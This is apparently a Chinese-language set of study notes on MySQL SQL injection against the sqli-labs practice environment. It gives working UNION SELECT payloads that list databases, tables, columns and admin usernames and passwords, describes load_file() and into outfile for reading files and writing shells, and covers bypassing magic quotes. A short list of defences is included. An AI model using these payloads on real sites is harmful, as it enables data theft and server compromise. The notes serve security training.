MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。
information_schema.tables:记录所有表名信息的表
information_schema.columns:记录所有列名信息的表
table_name:表名
column_name:列名
table_schema:数据库名
user() 查看当前MySQL登录的用户名
database() 查看当前使用MySQL数据库名
version() 查看当前MySQL版本
单引号 '
and 1=1
and 1=2
SELECT * FROM users WHERE id=1 and 1=1 LIMIT 0,1 正常
SELECT * FROM users WHERE id=1 and 1=2 LIMIT 0,1 错误
真 且 真 = 真
真 且 假 = 假
真 或 假 = 真
SELECT * FROM users WHERE id=1 真
1=1 真
1=2 假
真且真=真
真且假=假
SELECT * FROM users WHERE id=1 or 1=1 LIMIT 0,1 正常
SELECT * FROM users WHERE id=1 or 1=2 LIMIT 0,1 正常
limit m,n 从m行开始,到m+n行结束
select * from admin limit 2,1 指的是 从第二行开始,到第三行结束(从第二行开始查取一行数据)
information_schema 表特性,记录库名,表名,列名对应表
通过select * from schemata; 进行数据库名查询,再去选择进行查询获取指明数据库里的数据
获取所有数据库名:
http://127.0.0.1:8080/sqlilabs/Less-2/?id=-1union select 1,group_concat(schema_name),3 from information_schema.schemata
获取指定qqyw数据库名下的表名信息:
union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='qqyw'
获取指定qqyw下的表名admin下的列名信息:
union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin' and table_achema='qqyw'
获取指定qqyw下的admin数据
union select 1,u,p,4 from qqyw.admin
会用到MySQL数据库里两个内置函数,这两个函数是MySQL数据库特有的,在其他数据库是没有的或者在其他数据库中写法不 同,所以这是为什么说注入点分数据库的原因,因为每个数据库内置的安全机制和它的功能不同,这才导致在注入的时候针对不用的数据库采取的攻击思路也不同。MySQL有内置读取的操作函数,我们可以调用这个函数作为注入的攻击。
load_file():读取函数
into outfile 或 into dumpfile:导出函数
(将x写入www文件中)
路径获取常见方法:
报错显示:一般网站出现错误的时候它会泄露出路径
遗留文件:站长为了调试信息的时候遗留的文件而泄露的 路径。用扫描工具可以扫出
漏洞报错:知道对方是用什么程序搭建再去网上去搜索漏洞信息:phpcms 爆路径
平台配置文件:通过读取文件来读取搭建网站平台的配置文件。缺点:路径不是默认的,一旦更改很难找到路径
爆破
windows:
d:/wwwroot/xiaodi8/
linux:
/var/www/xiaodi8
扩展连接:
常见的load_file()读取的敏感信息_weixin_30292843的博客-CSDN博客
常见写入文件问题:魔术引号开关
magic_quotes_gpc
a. 编码或宽字节绕过:
比如在sqlmap中添加--temper脚本参数转码
或者使用转换工具
b. 防护:
1.)自带防御:魔术引号
2.)内置函数:int等
3.)自定义关键字:select等
4.)WAF防护软件:安全狗、宝塔等
字典或读取
常见的load_file()读取的敏感信息_weixin_30292843的博客-CSDN博客
先来温习一下基本注入流程:
order by x(数字) 正常与错误的正常值 正确网页正常显示,错误网页报错
?id=1' order by 3--+
?id=-1 union select 1,2,3 --+
?id=-1 union select 1,database(),version() --+
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='已知库名'--+
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='已知表名'--+
?id=-1' union select 1,2,group_concat(已知字段名,':'已知字段名) from 已知表名--+
可以从SQL语法错误得出我们需要的东西
'1'' LIMIT 0,1 这个引号是我们自己加的 可以知道这个就是‘1',也就是说,这是个字符串类型的sql注入
在经过一番测试之后可以发现有三个字段
利用函数database(),user(),version()可以得到所探测数据库的数据库名、用户名和版本号
即可成功得到我们想要的用户名和密码